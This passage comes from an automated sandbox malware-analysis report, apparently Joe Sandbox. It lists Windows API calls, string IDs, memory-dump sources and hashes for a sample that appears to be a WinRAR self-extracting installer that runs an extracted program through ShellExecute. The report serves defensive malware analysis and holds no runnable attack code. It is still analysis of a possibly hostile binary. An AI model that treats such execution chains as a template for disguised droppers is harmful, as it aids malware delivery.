                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$EnvironmentHandleVariableView$AddressCloseDeleteH_prolog3H_prolog3_ModuleObjectProcUnmap_wcslen$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingOpenParamSleepStartupTime_swprintf
                                                                                                                                                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                                      • API String ID: 3142445277-3710569615
                                                                                                                                                      • Opcode ID: f6cd1615f6b466ada953cd3d00a5e5b1d1d4e36d0f223867a43004e2a7b87bf1
                                                                                                                                                      • Instruction ID: 740f7eabaf95f28917c25b31c6070eff8a499703e821b798177c0c22299e9c73
                                                                                                                                                      • Opcode Fuzzy Hash: f6cd1615f6b466ada953cd3d00a5e5b1d1d4e36d0f223867a43004e2a7b87bf1
                                                                                                                                                      • Instruction Fuzzy Hash: 0891F175904740AFD320EFB4EC45BABB7ECBB88701F404929F94997192DBB49846CB22

                                                                                                                                                      Control-flow Graph
                                                                                                                                                      APIs
                                                                                                                                                      • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00A40845,00000066), ref: 00A3EBE6
                                                                                                                                                      • SizeofResource.KERNEL32(00000000,?,?,?,00A40845,00000066), ref: 00A3EBFD
                                                                                                                                                      • LoadResource.KERNEL32(00000000,?,?,?,00A40845,00000066), ref: 00A3EC14
                                                                                                                                                      • LockResource.KERNEL32(00000000,?,?,?,00A40845,00000066), ref: 00A3EC23
                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00A40845,00000066), ref: 00A3EC3E
                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00A3EC4F
                                                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00A3EC73
                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00A3ECD7
                                                                                                                                                        • Part of subcall function 00A3EB06: GdipAlloc.GDIPLUS(00000010), ref: 00A3EB0C
                                                                                                                                                      • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00A3ECB8
                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00A3ECDE
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                                                      • String ID: PNG
                                                                                                                                                      • API String ID: 211097158-364855578
                                                                                                                                                      • Opcode ID: 5e0fb4760e1b48b5900fcc495a802a27d7ffe4c69777e1bf97e7bd71b40e403b
                                                                                                                                                      • Instruction ID: 9c8f9490f12c5f449a5c7c49699d4cd8aeab6863d270279e662e57d52394c7c8
                                                                                                                                                      • Opcode Fuzzy Hash: 5e0fb4760e1b48b5900fcc495a802a27d7ffe4c69777e1bf97e7bd71b40e403b
                                                                                                                                                      • Instruction Fuzzy Hash: 5C316D75600702AFD710DFA1ED4892FBFA8FB84762B040629F905C22A1EB31DC02CAA1
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A38781: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,5C02E116,00000007,?,?,?,00A38751,?,?,?,?,0000000C,00A24426), ref: 00A3879D
                                                                                                                                                      • _wcslen.LIBCMT ref: 00A3395A
                                                                                                                                                      • __fprintf_l.LIBCMT ref: 00A33AA7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWide__fprintf_l_wcslen
                                                                                                                                                      • String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL
                                                                                                                                                      • API String ID: 1796436225-285229759
                                                                                                                                                      • Opcode ID: 1d9be029c1fffe5893dd0ceb2ae8c4fa834644da0e060ef904cf33f7a931dab0
                                                                                                                                                      • Instruction ID: 03e49321a8c6ee8ffa55a8b894adbfa1650fda68d47666edc9f92335e2b303a6
                                                                                                                                                      • Opcode Fuzzy Hash: 1d9be029c1fffe5893dd0ceb2ae8c4fa834644da0e060ef904cf33f7a931dab0
                                                                                                                                                      • Instruction Fuzzy Hash: 0352C272904259AFDF24DFA8CD85AEEB7B4FF44310F10052AF906EB281EB719A45CB50

                                                                                                                                                      Control-flow Graph
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A2F830
                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?,00000274,00A2F733,000000FF,00000049,00000049,?,?,00A2A684,?,?,00000000,?,?,?), ref: 00A2F859
                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,00A2D303,?,?,?,?,?,?,?,5C02E116,00000049), ref: 00A2F8A4
                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00A2D303,?,?,?,?,?,?,?,5C02E116,00000049,?,00000000), ref: 00A2F902
                                                                                                                                                      • FindNextFileW.KERNEL32(?,?,00000274,00A2F733,000000FF,00000049,00000049,?,?,00A2A684,?,?,00000000,?,?,?), ref: 00A2F92D
                                                                                                                                                      • GetLastError.KERNEL32(?,00A2D303,?,?,?,?,?,?,?,5C02E116,00000049,?,00000000), ref: 00A2F93A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileFind$ErrorFirstLast$H_prolog3_Next
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3831798110-0
                                                                                                                                                      • Opcode ID: 86f9398567224a2d5536149227f80a792fef57da56fa382b3b5b0f072a905ff1
                                                                                                                                                      • Instruction ID: 1e674b7cfc821acd2fc1170cd92dc207c9c0b5f96388dc4b5b1fc4057111d4a9
                                                                                                                                                      • Opcode Fuzzy Hash: 86f9398567224a2d5536149227f80a792fef57da56fa382b3b5b0f072a905ff1
                                                                                                                                                      • Instruction Fuzzy Hash: 7D511171904629EFCF54DF68D989AEDB7B4BF09320F5002BAE519E3290D734AA85CF50
                                                                                                                                                      APIs
                                                                                                                                                      • _wcslen.LIBCMT ref: 00A2C342
                                                                                                                                                        • Part of subcall function 00A32095: __EH_prolog3_GS.LIBCMT ref: 00A3209C
                                                                                                                                                        • Part of subcall function 00A257C0: __EH_prolog3.LIBCMT ref: 00A257C7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3H_prolog3__wcslen
                                                                                                                                                      • String ID: __tmp_reference_source_
                                                                                                                                                      • API String ID: 1523997010-685763994
                                                                                                                                                      • Opcode ID: 51a70a71181a6a5059b569cbbf8c94af40d52971c87f349577a79bc81467e7a9
                                                                                                                                                      • Instruction ID: 24d9bd8318c2c06371b2b08296453eaac05c6d7cdea3aaabfe623dc2d9b34d27
                                                                                                                                                      • Opcode Fuzzy Hash: 51a70a71181a6a5059b569cbbf8c94af40d52971c87f349577a79bc81467e7a9
                                                                                                                                                      • Instruction Fuzzy Hash: D0D2F670904299AFDF29DF78E990BEEBBB5BF05314F04453EE48A97242D734A948CB50
                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,?,00A4EC80,00000000,00A66F40,0000000C,00A4EDD7,00000000,00000002,00000000), ref: 00A4ECCB
                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,00A4EC80,00000000,00A66F40,0000000C,00A4EDD7,00000000,00000002,00000000), ref: 00A4ECD2
                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00A4ECE4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                      • Opcode ID: 8e838b10e4611a6c99ee9bb576da873a7241a685140d67f8d17b0152e595de62
                                                                                                                                                      • Instruction ID: 3d06c5025a95898ab031034cdfbc5fa25d8b4f0f763e1acabe1009ceff259cca
                                                                                                                                                      • Opcode Fuzzy Hash: 8e838b10e4611a6c99ee9bb576da873a7241a685140d67f8d17b0152e595de62
                                                                                                                                                      • Instruction Fuzzy Hash: 38E0B636000708AFCF51EF94DE49A593B69FF91792B040424FD559A166CB36ED52DB80
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 431132790-0
                                                                                                                                                      • Opcode ID: ec9228cf0bbfc74fc78fa64574f07eabb6230b4335d1bef3aec45af12d34e3b3
                                                                                                                                                      • Instruction ID: aacc9cc05ed986bbeb1e46129bbb9bf2f2de8aeac5537bde4a349b741b3e4a06
                                                                                                                                                      • Opcode Fuzzy Hash: ec9228cf0bbfc74fc78fa64574f07eabb6230b4335d1bef3aec45af12d34e3b3
                                                                                                                                                      • Instruction Fuzzy Hash: DCE1B471A183458FDB24DF28C984B5BBBE2BF88304F04456DF9899B342D774E945CBA2
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_catch_GS.LIBCMT ref: 00A4090A
                                                                                                                                                        • Part of subcall function 00A21E44: GetDlgItem.USER32(00000000,00003021), ref: 00A21E88
                                                                                                                                                        • Part of subcall function 00A21E44: SetWindowTextW.USER32(00000000,00A5C6C8), ref: 00A21E9E
                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 00A40A18
                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A40A57
                                                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A40A71
                                                                                                                                                      • IsDialogMessageW.USER32(?,?), ref: 00A40A84
                                                                                                                                                      • TranslateMessage.USER32(?), ref: 00A40A92
                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 00A40A9C
                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00A40ADE
                                                                                                                                                      • GetDlgItem.USER32(?,00000068), ref: 00A40B04
                                                                                                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00A40B1F
                                                                                                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,00A5C6C8), ref: 00A40B32
                                                                                                                                                      • SetFocus.USER32(00000000), ref: 00A40B39
                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00A40C20
                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00A40C4C
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00A40C79
                                                                                                                                                      • GetLastError.KERNEL32(?,00000011), ref: 00A40CD5
                                                                                                                                                      • GetCommandLineW.KERNEL32 ref: 00A40DF9
                                                                                                                                                      • _wcslen.LIBCMT ref: 00A40E06
                                                                                                                                                      • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,?,winrarsfxmappingfile.tmp,?,00A75430,00000400,00000001,00000001), ref: 00A40E85
                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 00A40EA3
                                                                                                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00A40EDC
                                                                                                                                                      • WaitForInputIdle.USER32(?,00002710), ref: 00A40F0B
                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 00A40F25
                                                                                                                                                      • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,00A75430,00000400), ref: 00A40F61
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00A75430,00000400), ref: 00A40F6D
                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A41072
                                                                                                                                                        • Part of subcall function 00A21E1F: GetDlgItem.USER32(?,?), ref: 00A21E34
                                                                                                                                                        • Part of subcall function 00A21E1F: ShowWindow.USER32(00000000), ref: 00A21E3B
                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000065,00A5C6C8), ref: 00A4108A
                                                                                                                                                      • GetDlgItem.USER32(?,00000065), ref: 00A41093
                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00A410A2
                                                                                                                                                      • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_000206D0,00000000,?), ref: 00A41422
                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00A41436
                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00A410B1
                                                                                                                                                        • Part of subcall function 00A3E265: __EH_prolog3_GS.LIBCMT ref: 00A3E26C
                                                                                                                                                        • Part of subcall function 00A3E265: ShowWindow.USER32(?,00000000,00000038), ref: 00A3E294
                                                                                                                                                        • Part of subcall function 00A3E265: GetWindowRect.USER32(?,?), ref: 00A3E2D8
                                                                                                                                                        • Part of subcall function 00A3E265: ShowWindow.USER32(?,00000005,?,00000000), ref: 00A3E373
                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A4114F
                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000001,00010447), ref: 00A41284
                                                                                                                                                      • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,16050E2A), ref: 00A4129D
                                                                                                                                                      • GetDlgItem.USER32(?,00000068), ref: 00A412A6
                                                                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00A412BE
                                                                                                                                                      • GetDlgItem.USER32(?,00000066), ref: 00A412E6
                                                                                                                                                      • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00A4135D
                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A41371
                                                                                                                                                      • EnableWindow.USER32(?,00000000), ref: 00A415A7
                                                                                                                                                      • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00A415E8
                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00A4160D
                                                                                                                                                        • Part of subcall function 00A41D4F: __EH_prolog3_GS.LIBCMT ref: 00A41D59
Strings
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: Item$Message$TextWindow$Send$Dialog$ErrorFileLastShow$H_prolog3_LongView$CloseCommandCountCreateDispatchEnableExecuteFocusH_prolog3_catch_HandleIdleInputLineMappingParamRectShellSleepTickTranslateUnmapWait_wcslen
• String ID: -el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_$winrarsfxmappingfile.tmp
• API String ID: 3616063595-3000381960
• Opcode ID: b45c9fd17c0056533255799db510af8dbea123ee5f015da2422d73d395dfb733
• Instruction ID: 640ed61f282a4b1507391a51cccd885a0300b26df923e9a1ea706512231ff59f
• Opcode Fuzzy Hash: b45c9fd17c0056533255799db510af8dbea123ee5f015da2422d73d395dfb733
• Instruction Fuzzy Hash: F272E274D00358EEEB20EBB4DD49FEE7BB8AB51300F008568F109B7192D7B45A86DB61

Control-flow Graph
APIs
• GetModuleHandleW.KERNEL32(kernel32,5C02E116), ref: 00A36DC7
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00A36DD9
• GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A36E03
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A370CA
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A370DF
• ReadFile.KERNEL32(00000000,?,00007FFE,?,00000000), ref: 00A370FF
• CloseHandle.KERNEL32(00000000), ref: 00A37187
• CompareStringW.KERNEL32(00000400,00001001,?,000000FF,DXGIDebug.dll,000000FF,?,?,?), ref: 00A371F8
• AllocConsole.KERNEL32 ref: 00A3735E
• GetCurrentProcessId.KERNEL32 ref: 00A37368
• AttachConsole.KERNEL32(00000000), ref: 00A3736F
• GetStdHandle.KERNEL32(000000F4,00000000,00000000,?,00000000), ref: 00A3738F
• WriteConsoleW.KERNEL32(00000000), ref: 00A37396
• Sleep.KERNEL32(00002710), ref: 00A373A1
• FreeConsole.KERNEL32 ref: 00A373A7
• ExitProcess.KERNEL32 ref: 00A373B7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentExitFreeModulePointerReadSleepStringWrite
• String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
• API String ID: 2644799563-3298887752
• Opcode ID: fa1c723f24d8bef76f896c6afc3a6691e75a2ccb8a9ab0fa9c106b9294a1ffbf
• Instruction ID: 1dd918a7519e6951fa7fb8175ee26e11642518a1fcc27f354870f93b43c26c42
• Opcode Fuzzy Hash: fa1c723f24d8bef76f896c6afc3a6691e75a2ccb8a9ab0fa9c106b9294a1ffbf
• Instruction Fuzzy Hash: 41F15AB1404388ABDB30EFA4DD49BDE3BA9BF05316F504219FD099B291DB70964DCB91

Control-flow Graph

APIs
  • Part of subcall function 00A40678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A40689
  • Part of subcall function 00A40678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A4069A
  • Part of subcall function 00A40678: IsDialogMessageW.USER32(00010452,?), ref: 00A406AE
  • Part of subcall function 00A40678: TranslateMessage.USER32(?), ref: 00A406BC
  • Part of subcall function 00A40678: DispatchMessageW.USER32(?), ref: 00A406C6
• GetDlgItem.USER32(00000068,00000000), ref: 00A43595
• ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,00A3FD20,00000001,?,?), ref: 00A435BA
• SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00A435C9
• SendMessageW.USER32(00000000,000000C2,00000000,00A5C6C8), ref: 00A435D7
• SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A435F1
• SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00A4360B
• SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A4364F
• SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00A43662
• SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A43675
• SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A4369C
• SendMessageW.USER32(00000000,000000C2,00000000,00A5C860), ref: 00A436AB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
• String ID: \
• API String ID: 3569833718-2967466578
• Opcode ID: 894ee5d12869051d0ea812a326a8e0833c952c2ca68af8a3496532523140db73
• Instruction ID: deaa2e45347be5591e5321dc75506658a3168480a1c36ca9c99cd8826b6e6630
• Opcode Fuzzy Hash: 894ee5d12869051d0ea812a326a8e0833c952c2ca68af8a3496532523140db73
• Instruction Fuzzy Hash: DA310171249700BFE300DF60DC49F6FBBECEF95711F400628F9559A2A1D7B099858BA6

Control-flow Graph
APIs
• __EH_prolog3_GS.LIBCMT ref: 00A438A7
• ShellExecuteExW.SHELL32(?), ref: 00A43AA4
• IsWindowVisible.USER32(?), ref: 00A43ACF
• ShowWindow.USER32(?,00000000), ref: 00A43ADD
• WaitForInputIdle.USER32(?,000007D0), ref: 00A43AED
• GetExitCodeProcess.KERNEL32(?,?), ref: 00A43B0F
• CloseHandle.KERNEL32(?), ref: 00A43B33
• ShowWindow.USER32(?,00000001), ref: 00A43B76
Strings
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: Window$Show$CloseCodeExecuteExitH_prolog3_HandleIdleInputProcessShellVisibleWait
• String ID: .exe$.inf
• API String ID: 3208621885-3750412487
• Opcode ID: 053cb2b1ed1aa9a3948f28255852e2f0c7df4dfb195aad39049a2f92128fd06d
• Instruction ID: 411befd3d03cd59f93898131fa005fdfa887b6b41f2b4eea7d6e63e39365de65
• Opcode Fuzzy Hash: 053cb2b1ed1aa9a3948f28255852e2f0c7df4dfb195aad39049a2f92128fd06d
• Instruction Fuzzy Hash: A0B1BD36E00258DFCF21DFA4D9957ED77B5EF84310F248129E848AB251D7B0AE868B50

Control-flow Graph
APIs
• GetClassNameW.USER32(?,?,00000050), ref: 00A3F2EF
• SHAutoComplete.SHLWAPI(?,00000010), ref: 00A3F326
  • Part of subcall function 00A38DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00A30E3F,?,?,?,00000046,00A31ECE,00000046,?,exe,00000046), ref: 00A38DBA
• FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00A3F316
Strings
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
